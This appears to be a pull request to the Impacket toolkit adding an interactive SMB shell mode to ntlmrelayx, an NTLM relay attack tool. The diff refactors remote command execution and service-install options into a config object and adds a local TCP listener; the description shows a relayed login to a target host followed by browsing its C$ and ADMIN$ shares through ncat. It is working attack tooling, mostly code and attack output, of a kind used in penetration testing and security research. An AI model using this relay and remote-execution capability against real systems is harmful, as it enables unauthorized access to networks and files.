### PR TITLE
Ntlmrelayx interactive SMB shell

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -53,9 +53,8 @@ from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.smbconnection import SMBConnection
 
-
 class SMBAttack(Thread):
-    def __init__(self, config, SMBClient, exeFile, command):
+    def __init__(self, config, SMBClient, username):
         Thread.__init__(self)
         self.daemon = True
         if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
@@ -63,18 +62,17 @@ class SMBAttack(Thread):
         else:
             self.__SMBConnection = SMBClient
         self.config = config
-        self.__exeFile = exeFile
-        self.__command = command
         self.__answerTMP = ''
-        if exeFile is not None:
-            self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
+        if self.config.exeFile is not None:
+            self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
+
 
     def __answer(self, data):
         self.__answerTMP += data
 
     def run(self):
         # Here PUT YOUR CODE!
-        if self.__exeFile is not None:
+        if self.config.exeFile is not None:
             result = self.installService.install()
             if result is True:
                 logging.info("Service Installed.. CONNECT!")
@@ -97,8 +95,8 @@ class SMBAttack(Thread):
                 return
 
             try:
-                if self.__command is not None:
-                    remoteOps._RemoteOperations__executeRemote(self.__command)
+                if self.config.command is not None:
+                    remoteOps._RemoteOperations__executeRemote(self.config.command)
                     logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
                     self.__answerTMP = ''
                     self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -30,6 +30,7 @@ class NTLMRelayxConfig:
         #SMB options
         self.exeFile = None
         self.command = None
+        self.interactive = False
 
         #LDAP options
         self.dumpdomain = True
@@ -76,3 +77,6 @@ class NTLMRelayxConfig:
 
     def setMSSQLOptions(self,queries):
         self.queries = queries
+
+    def setInteractive(self,interactive):
+        self.interactive = interactive

--- a/impacket/examples/ntlmrelayx/utils/tcpshell.py
+++ b/impacket/examples/ntlmrelayx/utils/tcpshell.py
@@ -1,0 +1,35 @@
+#!/usr/bin/python
+# Copyright (c) 2013-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# TCP interactive shell
+#
+# Author:
+#  Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
+#
+# Description:
+#     Launches a TCP shell for interactive use of clients
+# after successful relaying
+import socket
+#Default listen port
+port = 11000
+class TcpShell:
+    def __init__(self):
+        global port
+        self.port = port
+        #Increase the default port for the next attack
+        port += 1
+
+    def listen(self):
+        #Set up the listening socket
+        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        #Bind on localhost
+        serversocket.bind(('127.0.0.1', self.port))
+        #Dont allow a backlog
+        serversocket.listen(0)
+        self.connection, host = serversocket.accept()
+        #Create a file object from the socket
+        self.socketfile = self.connection.makefile()


### PR DESCRIPTION
- Cleaned up some legacy configs for the new config object
- Added interactive mode for SMB client:
The interactive mode relays to SMB and then launches an smbclient shell (smbclient.py slightly changed to accommodate this). Because the main ntlmrelayx process is both too busy and not suitable for multiple shells, the script will listen on a local port (default 11000), where you can connect with netcat or ncat to interact with shares as you would with smbclient :)

Example:
```
>python ntlmrelayx.py -t smb://192.168.175.129 -i
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host

[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.175.133, attacking target 192.168.175.129
[*] Authenticating against 192.168.175.129 as S A N O \T e s t  SUCCEED
[*] <snip>
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
```
```
>ncat 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw-          0  Sat Oct 03 13:46:23 2015 $Recycle.Bin
-rw-rw-rw-         24  Wed Oct 23 19:04:06 2013 autoexec.bat
-rw-rw-rw-         10  Wed Oct 23 19:04:06 2013 config.sys
drw-rw-rw-          0  Wed Oct 23 19:10:18 2013 Documents and Settings
-rw-rw-rw- 1073741824  Thu Oct 06 22:38:46 2016 pagefile.sys
drw-rw-rw-          0  Wed Oct 23 19:10:01 2013 PerfLogs
drw-rw-rw-          0  Thu Nov 27 00:23:01 2014 Program Files
drw-rw-rw-          0  Thu Nov 27 00:23:01 2014 ProgramData
drw-rw-rw-          0  Wed Oct 23 18:22:42 2013 Recovery
drw-rw-rw-          0  Wed Oct 23 23:04:28 2013 System Volume Information
drw-rw-rw-          0  Sat Oct 03 13:45:50 2015 Users
drw-rw-rw-          0  Wed Oct 23 23:52:20 2013 Wallpaper
drw-rw-rw-          0  Sun Aug 07 12:35:36 2016 Windows
```